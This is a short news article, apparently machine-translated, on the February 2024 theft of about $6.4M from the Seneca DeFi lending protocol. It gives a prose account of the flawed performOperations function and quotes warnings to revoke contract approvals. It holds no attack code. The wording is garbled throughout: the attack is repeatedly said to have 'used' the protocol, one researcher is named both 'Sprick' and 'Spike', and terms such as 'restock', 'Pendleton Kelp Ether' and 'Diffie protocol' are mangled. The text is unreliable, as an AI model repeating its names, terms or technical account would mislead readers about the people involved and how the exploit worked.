Decentralized lending platform Seneca was exploited for $6.4M
The decentralized finance (DeFi) lending platform and stablecoin issuer Seneca Protocol was used, according to a statement posted on the protocol's official X account on February 28. In a report published by Cointelegraph, blockchain analytics firm CertiK estimated the losses so far at $6.4 million. Seneca Group urges users to cancel approvals for the affected contracts. His staff said they are “currently working with security specialists to investigate the error”.
We are actively working with security specialists to investigate the approved bug discovered today.
In the meantime, cancel approvals for the following addresses: #EthereumPT-ezETH 0x529eBB6D157dFE5AE2AA7199a6f9E0e9830E6Dc1apxETH 0xD837321Fc7fabA9af2f37EFFA08d…49C4
— Seneca (@SenecaUSD) February 28, 2024
The Seneca Protocol is a DeFi lending application that allows users to deposit various cryptocurrencies as collateral, which can be used to borrow and lend the protocol's native stablecoin, SenecaUSD.
Blockchain data shows that an account ending in 42DC was able to restock approximately 1,385.23 Pendleton Kelp Ether (PT Kelp rsETH) from the Seneca Collateral Pool, by calling the “performOperations” function. The account then exchanged these tokens for $4 million worth of Ether (ETH) in three transactions. After these exchanges, the account transferred an additional 717.04 ETH derivative tokens from various holding pools and converted them to ETH.
In its report, CertiK said these transfers were malicious. They were made possible by a flaw in the protocol's “performOperations” function, the report said. When error specifies OPERATION_CALL as the action, it allows any tag to call the function. This allows the attacker to “make outbound calls to any address as the call and call data are completely under the attacker's control. As a result, the attacker is able to withdraw funds from a pool that he does not own,” CertiK said.
Blockchain researcher Sprick has warned users about the exploit on X, saying it represents a “critical vulnerability.” Spike suggested that users should revoke authorizations for the addresses used in the exploit.
Related: Serenity Shield Token Crashes About 99% After Metamask Wallet Breach
According to security researcher Dimitrov22, Seneca suffers from an additional vulnerability that prevents developers from stopping Seneca contracts, because the pause and stop functions in them contain the keyword “internal”, which means “there is no way to call them”.
The Seneca protocol is hacked and cannot be paused, even though it inherits a pauseable library.
This is because the `_pause' and `_stop' functions are internal and there is no way to call them. pic.twitter.com/en0qIsayMX
— ddimitrov22 (@ddimitrovv22) February 28, 2024
In a post acknowledging the attack, the development team said it was investigating and would post an update “shortly.”
Hacking and exploits continue to threaten Web3 users in 2024. On February 23rd, Axi Infinity founder Jeff “Geez” Zirlin lost $9.7 million in a hack from his personal wallet. On the same day, Diffie protocol Blueberry was used for 457 ETH.
